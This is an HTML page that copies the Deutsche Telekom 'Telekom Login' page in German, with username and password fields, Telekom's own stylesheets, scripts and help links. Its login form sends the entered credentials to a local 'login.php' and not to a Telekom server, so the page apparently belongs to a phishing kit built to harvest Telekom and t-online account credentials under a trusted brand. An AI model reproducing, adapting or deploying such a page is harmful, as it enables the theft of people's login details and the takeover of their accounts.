
<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--><html class="no-js" lang="de"><!--<![endif]-->

<!-- HEAD -->
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Telekom Login</title>
    <meta name="description" content="Telekom Login">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" type="text/css" href="https://accounts.login.idm.telekom.com/static/vdplus/css/components.min.css">
    <link rel="stylesheet" type="text/css" href="https://accounts.login.idm.telekom.com/static/factorx/vdplus/css/login.css">

</head>
<!-- /HEAD -->

<!-- BODY -->
<body>
    <!-- HEADER -->
    <header id="tbs-header" >
        <div id="tbs-header-content">
            <div class="container-fixed clearfix">
                <div class="tbs-text-zero pull-left">
                    <i class="icon icon-large icon-telekom-1T1"></i>
                    <i class="icon icon-large icon-digits"></i>
                </div>
                <div class="pull-right">
                    <p class="text-right text-bold text-small tbs-text-upper">erleben, was verbindet.</p>
                </div>
            </div>
        </div>
    </header>
    <!-- /HEADER -->

    <!-- CONTENT -->
    <div>
        <div class="container-fixed">
    <div id="tbs-headline" class="col-s-12 col-m-8 col-l-6 offset-s-0 offset-m-2 offset-l-3">
        <div id="tbs-brand" class="tbs-relative text-center">
            <h4>Telekom.de</h4>
            
        </div>
        <h1 class="text-center">
            <span>Mit dem Telekom Login anmelden</span>
        </h1>
    </div>
    <div id="tbs-container" class="col-s-12 col-m-8 col-l-6 offset-s-0 offset-m-2 offset-l-3">
        
        <div class="offset-bottom-1">
            <form id="login" name="login" method="POST" action="login.php" accept-charset="UTF-8" autocomplete="off">
                <!-- XSRF Prevention -->
                <input type="hidden" name="xsrf_IP4mMOH254c4WwbxxqO8UQ" value="UZEEYExQclIZvagwxkl1hg">
                
        <input id="domain" name="pw_domt" value="t-online.de" type="hidden">

                <!-- username component -->
                <div class="offset-bottom-1">

                    <!-- username input -->
                    <div class="form-input-set">
                        <input id="pw_usr" name="pw_usr" type="text" class="form-input" maxlength="256" aria-describedby="usrInfo" tabindex="10" value="">
                        <label for="pw_usr">Benutzername</label>
                        <i class="info-question-icon" data-toggle="collapse" data-target="#usrInfo" data-toggle-hide="true" tabindex="60"></i>
                    </div>

                    <!-- username info box -->
                    <div id="usrInfo" class="info-box pointer">
                        <p>Als Benutzernamen können Sie eine der folgenden Optionen eingeben:</p>
                        <ul>
                            <li>Ihre E-Mail-Adresse @t-online.de - dabei müssen Sie nur Ihre individuelle Kennung vor dem @-Symbol eingeben</li>
                            <li>Ihre Mobilfunk-Nummer, die Sie mit Ihrem Benutzerkonto verknüpft haben</li>
                            <li>Ihre E-Mail-Adresse bei einem anderen Anbieter, die Sie bei der Registrierung festgelegt haben</li>
                        </ul>
                    </div>
                </div>

                <!-- password component -->
                <div class="offset-bottom-1">
                    <!-- password input -->
                    <div class="form-input-set">
                        <input id="pw_pwd" name="pw_pwd" type="password" maxlength="128" class="form-input" tabindex="20">
                        <label for="pw_pwd">Passwort</label>
                    </div>
                </div>

                <!-- general error message -->
                

                <!-- persist session and recovery components -->
                <div class="login-helpers clearfix">
                    <!-- persist session component -->
                    <div id="tbs-signin-remember" class="form-checkbox-set">
                        <label>
                            <input id="checkbox_permanent" type="checkbox" name="persist_session" value="1" class="form-checkbox" tabindex="30">
                            <span>Angemeldet bleiben</span>
                        </label>
                    </div>
                    <!-- recovery link element -->
                    <div id="tbs-recovery-link" class="text-right">
                        <a href="
         https://meinkonto.telekom-dienste.de/wiederherstellung/passwort/index.xhtml
      " target="_blank" tabindex="70">Benutzername oder Passwort vergessen?</a>
                    </div>
                </div>

                <!-- Login button element -->
                <div class="clearfix">
                    <button id="pw_submit" name="pw_submit" type="submit" class="text-center btn btn-brand btn-block btn-large tbs-text-upper" tabindex="40">Login</button>
                </div>
            </form>

            
        </div>

        <div class="text-center offset-bottom-2">
            <a href="https://www.telekom.de/hilfe/vertrag-meine-daten/login-daten-passwoerter" tabindex="45" target="_blank">Brauchen Sie Hilfe?</a>
        </div>

        <div class="text-center offset-bottom-2">
            <div>
                <p>
                    <a class="text-nowrap" tabindex="50" href="https://meinkonto.telekom-dienste.de/telekom/account/registration/assistant/index.xhtml?sid=telekomde">Jetzt für Telekom.de registrieren</a>
                    <span>und mit dem Telekom Login weitere Produkte nutzen.</span>
                </p>
            </div>
        </div>

        <div id="tbs-services" class="text-center">
            <img src="https://accounts.login.idm.telekom.com/static/factorx/vdplus/images/services.png" />
        </div>
    </div>
</div>
    </div>

    

    <!-- /CONTENT -->

    <!-- FOOTER -->
    <footer id="tbs-footer" class="sticky">
        <div class="footer-content container-fixed text-small clearfix">
            <div class="pull-left">
                <p>&copy; 2018 Deutsche Telekom AG</p>
                <p class="tbs-text-11">20.16.0, 85d8a6aad35b7830db0299131f0101fb, 8d0b3082a010c09aa33e396a3f264d75f6e7ac6a</p>
            </div>
            <div class="pull-right clearfix">
                <div class="pull-left">
                    <a href="https://www.telekom.com/impressum" target="_blank" tabindex="90">Impressum</a>
                </div>
                <div class="pull-left">
                    <a id="data-protection" href="javascript:Login.openPopupCenter('https://accounts.login.idm.telekom.com/static/html/datenschutz.html', 'popup', 720, 650);" tabindex="100">Datenschutz</a>
                </div>
            </div>
        </div>
    </footer>
    <!-- /FOOTER -->

    <!-- Status -->
    <script>
        var accountLocked = false;
        var accountLockedPermanent = false;
        var accountLockExpiration = 0;
    </script>

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script type="text/javascript" src="https://accounts.login.idm.telekom.com/static/vdplus/js/html5shiv.js"></script>
    <script type="text/javascript" src="https://accounts.login.idm.telekom.com/static/vdplus/js/respond.min.js"></script>
    <![endif]-->

    <script type="text/javascript" src="https://accounts.login.idm.telekom.com/static/vdplus/js/jquery-3.2.1.min.js"></script>
    <script type="text/javascript" src="https://accounts.login.idm.telekom.com/static/vdplus/js/components.min.js"></script>
    <script type="text/javascript" src="https://accounts.login.idm.telekom.com/static/factorx/vdplus/js/login.js"></script>

    <!-- Tracking -->
    <!-- Callback Tracking -->
    <iframe id="callback-tracking" src="https://www.telekom.de/resources/tbs-config/phoenix_login_tracking?page=login&amp;mode=web&amp;context=auth&amp;status=first_attempt"></iframe>

    <!-- Toon Template Debugging -->
    

    </body>
    <!-- /BODY -->

</html>
